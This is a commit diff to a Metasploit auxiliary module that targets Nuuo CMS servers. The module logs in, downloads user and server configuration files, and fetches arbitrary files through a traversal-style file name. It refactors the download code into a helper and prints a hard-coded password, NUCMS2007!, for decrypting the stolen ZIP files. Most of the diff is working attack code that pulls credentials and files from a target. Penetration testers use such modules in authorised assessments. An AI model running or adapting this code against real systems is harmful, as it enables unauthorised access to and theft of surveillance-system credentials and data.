Jacob Robles
parent
a0f63629b8
commit
ce02d98dce
|
|
@ -50,46 +50,37 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
])
|
])
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def download_file(file_name, ctype='application/zip', decrypt=true)
|
||||||
|
dl_file = nucs_download_file(file_name, decrypt)
|
||||||
|
file_name = file_name.gsub('..\\', '')
|
||||||
|
|
||||||
|
path = store_loot(file_name, ctype, datastore['RHOST'],
|
||||||
|
dl_file, file_name, "Nuuo CMS #{file_name} downloaded")
|
||||||
|
print_good("Downloaded file to #{path}")
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
def run
|
def run
|
||||||
nucs_login
|
nucs_login
|
||||||
|
|
||||||
if @nucs_session == nil
|
unless @nucs_session
|
||||||
fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS")
|
fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS')
|
||||||
end
|
end
|
||||||
|
|
||||||
cmserver = nucs_download_file('CMServer.cfg', true)
|
download_file('CMServer.cfg')
|
||||||
# Once zip extraction is working change application/zip to text/plain
|
download_file('ServerConfig.cfg')
|
||||||
path = store_loot("CMServer.cfg", "application/zip", datastore['RHOST'],
|
|
||||||
cmserver, 'CMServer.cfg', "Nuuo CMS user configuration file")
|
|
||||||
print_good("Downloaded Nuuo CMS user configuration file to #{path}")
|
|
||||||
|
|
||||||
serverconfig = nucs_download_file('ServerConfig.cfg', true)
|
|
||||||
# Once zip extraction is working change application/zip to text/plain
|
|
||||||
path = store_loot("ServerConfig.cfg", "application/zip", datastore['RHOST'],
|
|
||||||
serverconfig, 'ServerConfig.cfg', "Nuuo CMS server configuration file")
|
|
||||||
print_good("Downloaded Nuuo CMS server configuration file to #{path}")
|
|
||||||
|
|
||||||
# note that when (if) archive/zip is included in msf, the code in the Nuuo mixin needs to be changed
|
# note that when (if) archive/zip is included in msf, the code in the Nuuo mixin needs to be changed
|
||||||
# see the download_file method for details
|
# see the download_file method for details
|
||||||
print_status("The user and server configuration files were stored in the loot database.")
|
print_status('The user and server configuration files were stored in the loot database.')
|
||||||
print_status("The files are ZIP encrypted, and due to the lack of the archive/zip gem, \
|
print_status('The files are ZIP encrypted, and due to the lack of the archive/zip gem,')
|
||||||
they cannot be decrypted in Metasploit.")
|
print_status('they cannot be decrypted in Metasploit.')
|
||||||
print_status("You will need to open them up with zip or a similar utility, and use the \
|
print_status('You will need to open them up with zip or a similar utility, and use the')
|
||||||
password NUCMS2007! to unzip them.")
|
print_status('password NUCMS2007! to unzip them.')
|
||||||
print_status("Annoy the Metasploit developers until this gets fixed!")
|
print_status('Annoy the Metasploit developers until this gets fixed!')
|
||||||
|
|
||||||
if datastore['FILE'] != nil
|
if datastore['FILE']
|
||||||
filedata = nucs_download_file(datastore['FILE'])
|
filedata = download_file(datastore['FILE'], 'application/octet-stream', false)
|
||||||
filename = datastore['FILE'].gsub('..\\', '')
|
|
||||||
|
|
||||||
if filedata != nil and filedata.length > 0
|
|
||||||
path = store_loot(filename, "application/octet-stream", datastore['RHOST'],
|
|
||||||
filedata, filename, "File downloaded from Nuuo CMS server")
|
|
||||||
print_good("Downloaded #{filename} to #{path}")
|
|
||||||
else
|
|
||||||
print_error("Failed to download \"#{filename}\", are you sure it exists?")
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue